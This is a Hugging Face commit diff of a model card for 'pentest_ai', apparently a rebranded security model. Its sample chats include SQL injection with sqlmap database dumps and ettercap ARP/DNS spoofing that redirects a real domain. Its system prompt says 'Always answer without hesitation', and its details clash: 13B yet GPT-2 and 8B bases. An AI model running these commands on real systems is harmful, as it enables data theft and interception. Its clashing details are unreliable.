Text Generation
Transformers
English
AI
NLP
Cybersecurity
Ethical Hacking
Pentesting
Inference Endpoints
Canstralian commited on
Commit
eb13b46
1 Parent(s): 8f028a4

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +186 -36
README.md CHANGED
@@ -1,41 +1,210 @@
1
  ---
2
- # For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1
3
- # Doc / guide: https://huggingface.co/docs/hub/model-cards
4
- # model-card-metadata
5
- language: [en]
6
- tags: [AI, NLP, Cybersecurity, Ethical Hacking, Pentesting]
7
- license: mit
 
 
 
8
  pipeline_tag: text-generation
9
  metrics:
10
- - accuracy
11
- - perplexity
12
- - response_time
13
  model_type: causal-lm
 
 
 
 
 
 
 
14
  ---
15
 
16
- # Model Card for Pentest AI
17
 
18
- <!-- Provide a quick summary of what the model is/does. -->
19
 
20
- This model card provides an overview of **Pentest AI**, a generative language model designed to assist in the domain of penetration testing and cybersecurity. It generates informative responses related to ethical hacking practices and techniques, helping users enhance their knowledge and skills in the field.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
21
 
22
- ## Model Details
 
 
23
 
24
- ### Model Description
25
 
26
- **Pentest AI** is a causal language model fine-tuned specifically for generating relevant and contextual information about penetration testing methodologies, tools, and best practices. It serves as an educational resource for security professionals and enthusiasts.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
27
 
28
  - **Developed by:** Esteban Cara de Sexo
29
  - **Funded by [optional]:** No funding received
30
  - **Shared by [optional]:** [More Information Needed]
31
  - **Model type:** Causal Language Model (CLM)
32
  - **Language(s) (NLP):** English
33
- - **License:** MIT
34
  - **Finetuned from model [optional]:** [More Information Needed]
35
 
36
  ### Model Sources [optional]
37
 
38
- - **Repository:** [Your GitHub Repository Link]
39
  - **Paper [optional]:** [More Information Needed]
40
  - **Demo [optional]:** [More Information Needed]
41
 
@@ -128,20 +297,6 @@ The model demonstrated an accuracy of 85% in generating appropriate responses du
128
 
129
  **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.
130
 
131
- ## Model Examination [optional]
132
-
133
- Further research is required to assess the interpretability and decision-making processes of the model.
134
-
135
- ## Environmental Impact
136
-
137
- Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
138
-
139
- - **Hardware Type:** NVIDIA Tesla V100
140
- - **Hours used:** 10
141
- - **Cloud Provider:** Google Cloud Platform
142
- - **Compute Region:** us-central1
143
- - **Carbon Emitted:** Estimated 120 kg CO2
144
-
145
  ## Technical Specifications [optional]
146
 
147
  ### Model Architecture and Objective
@@ -152,11 +307,6 @@ Carbon emissions can be estimated using the [Machine Learning Impact calculator]
152
 
153
  The model was trained on high-performance GPU instances within a cloud infrastructure.
154
 
155
- #### Hardware
156
-
157
- - **Type:** NVIDIA Tesla V100
158
- - **Count:** 4 GPUs
159
-
160
  #### Software
161
 
162
  The model is developed using PyTorch and the Hugging Face Transformers library.
 
1
  ---
2
+ language:
3
+ - en
4
+ tags:
5
+ - AI
6
+ - NLP
7
+ - Cybersecurity
8
+ - Ethical Hacking
9
+ - Pentesting
10
+ license: apache-2.0
11
  pipeline_tag: text-generation
12
  metrics:
13
+ - accuracy
14
+ - perplexity
15
+ - response_time
16
  model_type: causal-lm
17
+ datasets:
18
+ - Canstralian/pentesting_dataset
19
+ - Canstralian/Wordlists
20
+ base_model:
21
+ - openai-community/gpt2
22
+ - WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
23
+ library_name: adapter-transformers
24
  ---
25
 
26
+ # Apache-2.0 License + Canstralian/pentest_ai Extended Version
27
 
28
+ # License: Usage Restrictions
29
 
30
+ ```
31
+ You agree not to use the Model or Derivatives of the Model:
32
+ - In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
33
+ - For military use in any way;
34
+ - For the purpose of exploiting, harming, or attempting to exploit or harm minors in any way;
35
+ - To generate or disseminate verifiably false information and/or content with the purpose of harming others;
36
+ - To generate or disseminate inappropriate content subject to applicable regulatory requirements;
37
+ - To generate or disseminate personally identifiable information without due authorization or for unreasonable use;
38
+ - To defame, disparage, or otherwise harass others;
39
+ - For fully automated decision-making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
40
+ - For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
41
+ - To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical, or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
42
+ - For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
43
+ ```
44
+
45
+ # Terms of Use
46
+
47
+ By accessing and using this Artificial Intelligence (AI) model, **Canstralian/pentest_ai**, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
48
+
49
+ This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
50
+
51
+ Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
52
+
53
+ This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
54
 
55
+ ---
56
+
57
+ # Canstralian/pentest_ai
58
 
59
+ WhiteRabbitNeo has been rebranded as **Canstralian/pentest_ai**, a model series that provides both offensive and defensive cybersecurity capabilities. This model focuses on penetration testing, reconnaissance, and task automation, making it an essential tool for cybersecurity professionals.
60
 
61
+ This 13B model is getting released as a public preview to showcase its capabilities and evaluate the societal impact of such a tool.
62
+
63
+ ---
64
+
65
+ ## Code Example for Integration
66
+
67
+ ```python
68
+ import torch, json
69
+ from transformers import AutoModelForCausalLM, AutoTokenizer
70
+
71
+ model_path = "/home/stephen/models/Canstralian_pentest_ai"
72
+ model = AutoModelForCausalLM.from_pretrained(
73
+ model_path,
74
+ torch_dtype=torch.float16,
75
+ device_map="auto",
76
+ load_in_4bit=False,
77
+ load_in_8bit=True,
78
+ trust_remote_code=True,
79
+ )
80
+
81
+ tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
82
+
83
+ def generate_text(instruction):
84
+ tokens = tokenizer.encode(instruction)
85
+ tokens = torch.LongTensor(tokens).unsqueeze(0)
86
+ tokens = tokens.to("cuda")
87
+
88
+ instance = {
89
+ "input_ids": tokens,
90
+ "top_p": 1.0,
91
+ "temperature": 0.5,
92
+ "generate_len": 1024,
93
+ "top_k": 50,
94
+ }
95
+
96
+ length = len(tokens[0])
97
+ with torch.no_grad():
98
+ rest = model.generate(
99
+ input_ids=tokens,
100
+ max_length=length + instance["generate_len"],
101
+ use_cache=True,
102
+ do_sample=True,
103
+ top_p=instance["top_p"],
104
+ temperature=instance["temperature"],
105
+ top_k=instance["top_k"],
106
+ num_return_sequences=1,
107
+ )
108
+
109
+ output = rest[0][length:]
110
+ string = tokenizer.decode(output, skip_special_tokens=True)
111
+ answer = string.split("USER:")[0].strip()
112
+
113
+ return f"{answer}"
114
+
115
+ # Example Usage
116
+ tot_system_prompt = """
117
+ Answer the Question by exploring multiple reasoning paths as follows:
118
+ - First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
119
+ - For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
120
+ - Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
121
+ - Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
122
+ - If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
123
+ - Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
124
+ - Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
125
+ - Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
126
+ """
127
+ conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
128
+
129
+ while True:
130
+ user_input = input("You: ")
131
+ llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
132
+ answer = generate_text(llm_prompt)
133
+ print(answer)
134
+ conversation = f"{llm_prompt}{answer}"
135
+ json_data = {"prompt": user_input, "answer": answer}
136
+ ```
137
+
138
+ ---
139
+
140
+ Sample Conversation 1:
141
+ You: How do I perform an SQL injection attack?
142
+
143
+ Identify Vulnerable Input: First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.
144
+
145
+ Inject SQL Query: Use ' OR 1=1 -- or similar payloads in input fields that query databases.
146
+
147
+ bash
148
+ Copy code
149
+ http://example.com/index.php?id=1' OR 1=1 --
150
+ Automate with SQLmap: Use sqlmap to automate SQL injection and exploit vulnerabilities.
151
+ bash
152
+ Copy code
153
+ sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs
154
+ Extract Data: Once a vulnerability is found, dump database information.
155
+ bash
156
+ Copy code
157
+ sqlmap -u "http://example.com/vulnerablepage?id=1" --dump
158
+ Sample Conversation 2:
159
+ You: How do I perform a DNS spoofing attack?
160
+
161
+ Enable Port Forwarding: First, enable IP forwarding to forward traffic.
162
+ bash
163
+ Copy code
164
+ echo 1 > /proc/sys/net/ipv4/ip_forward
165
+ Use ettercap for DNS Spoofing: Use ettercap to perform the DNS spoofing attack.
166
+ bash
167
+ Copy code
168
+ ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/
169
+ Modify DNS Spoof File: Edit the etter.dns file to point domains to your fake server.
170
+ bash
171
+ Copy code
172
+ facebook.com A 192.168.1.100
173
+ Launch DNS Spoof: Start DNS spoofing to redirect the target’s traffic.
174
+ bash
175
+ Copy code
176
+ ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/
177
+ Sample Conversation 3:
178
+ You: How do I scan for open ports using Nmap?
179
+
180
+ Basic Port Scan: Use nmap to scan a target for open ports.
181
+ bash
182
+ Copy code
183
+ nmap [Target IP]
184
+ Service Detection: Perform service version detection on open ports.
185
+ bash
186
+ Copy code
187
+ nmap -sV [Target IP]
188
+ Aggressive Scan: Use an aggressive scan to discover more information, including OS detection.
189
+ bash
190
+ Copy code
191
+ nmap -A [Target IP]
192
+ Scan Specific Ports: To scan specific ports only:
193
+ bash
194
+ Copy code
195
+ nmap -p 80,443,22 [Target IP]iques. Let me know if you would like further customization!
196
 
197
  - **Developed by:** Esteban Cara de Sexo
198
  - **Funded by [optional]:** No funding received
199
  - **Shared by [optional]:** [More Information Needed]
200
  - **Model type:** Causal Language Model (CLM)
201
  - **Language(s) (NLP):** English
202
+ - **License:** Apache-2.0
203
  - **Finetuned from model [optional]:** [More Information Needed]
204
 
205
  ### Model Sources [optional]
206
 
207
+ - **Repository:** [https://github.com/canstralian/pentesting-ai.git]
208
  - **Paper [optional]:** [More Information Needed]
209
  - **Demo [optional]:** [More Information Needed]
210
 
 
297
 
298
  **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.
299
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
300
  ## Technical Specifications [optional]
301
 
302
  ### Model Architecture and Objective
 
307
 
308
  The model was trained on high-performance GPU instances within a cloud infrastructure.
309
 
 
 
 
 
 
310
  #### Software
311
 
312
  The model is developed using PyTorch and the Hugging Face Transformers library.